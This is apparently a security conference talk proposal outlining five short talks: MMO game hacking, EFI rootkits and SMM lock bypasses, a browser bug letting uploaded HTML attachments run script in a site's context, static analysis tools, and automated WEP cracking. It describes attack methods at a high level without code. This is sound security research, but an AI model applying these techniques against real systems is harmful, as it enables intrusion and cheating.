Things I want to talk about (details below):
* MMO Hacking
* EFI Rootkits, SMM, and Disk Encryption
* Serving Untrusted Attachments = Doom
* Free Static Analysis: Dehydra vs. Clang vs. Elsa
* Auto-WEP key cracking with ITX

I want to strip out all the usual introduction and fluff and do about 5 turbo talks. Or one of these could be done as a separate turbo talk.

MMO Hacking
Things I've learned about hacking Massively Multiplayer Online games in my time as the director of security for MMO company Gazillion Entertainment. Useful tools and resources for game reversing and methods of preventing hacking (tips for attack AND defense).

EFI Rootkits, SMM and Disk Encryption
In the next year, every major chip manufacturer will ship boards that use EFI. This brings new life to the old idea of PCI Option ROM rootkits, which can now easily access libraries that provide filesystem access as well as a full network stack. What features of EFI make this easy? What are the constraints on an EFI rootkit? How could this be mitigated as an attack vector?

Loic's recent talk at CanSec West has described a method of bypassing to D_LOCK bit, allowing access to SMM even after it has been locked. The basic method of this approach, getting different chips on the motherboard out of sync is effective for all kinds of attacks against hardware (such as full disk encryption). Can full-disk encryption ever be successfully implemented? Is there even a point to using a TPM? Isn't AMT and ASF a _REALLY_BAD_IDEA?

The Trouble With Attachments: Serving Untrusted Files = Doom Since the provided user controls handle input encoding, injections are scarcer, but still available. One less conventional method I found relies on a bug in Internet Explorer. On a web application that allows file uploads, perhaps attachments, you can upload an HTML file containing the injection script.

When this attachment is viewed in Firefox, it will behave correctly and download the file first and then view it in a local file script context. In IE however, the downloaded HTML file is viewed with the script context of the site from which it was downloaded! This bug shows up in a lot of places, and there is no good fix. Demonstrations ;)

Free Static Analysis: Dehydra vs. Clang vs. Elsa
A new patch for GCC from Mozilla, Dehydra, allows the scripting of custom static analysis rules using Javascript via the SpiderMonkey engine. How does this make your life easier on the first two days of a code audit? Interesting semantic searches to perform on C++ code bases, advantages and limitations of this approach. Will also compare against the other two alternatives Clang and Elsa.

Auto-WEP key cracking with ITX
This has become so trivial, people are playing for time with average scores under 3 minutes. Tips and tricks for working around the idiosyncrasies of airtools in an embedded environment. Toolset has been ported to the EEEpc, and I can demo a Fonera-based unit the size of a deck of cards.

Ben Kurtz
Ben Kurtz is the Director of Security for Gazillion Entertainment, an MMO company. Prior to that, he spent some time in the trenches as a security consultant in Seattle. In previous incarnations, he worked on avionics, power plants, visualizations, automated network death machines, and once knitted a quite nice scarf.

Ben spoke at Defcons 13 and 15, CCCamp07, and 25c3.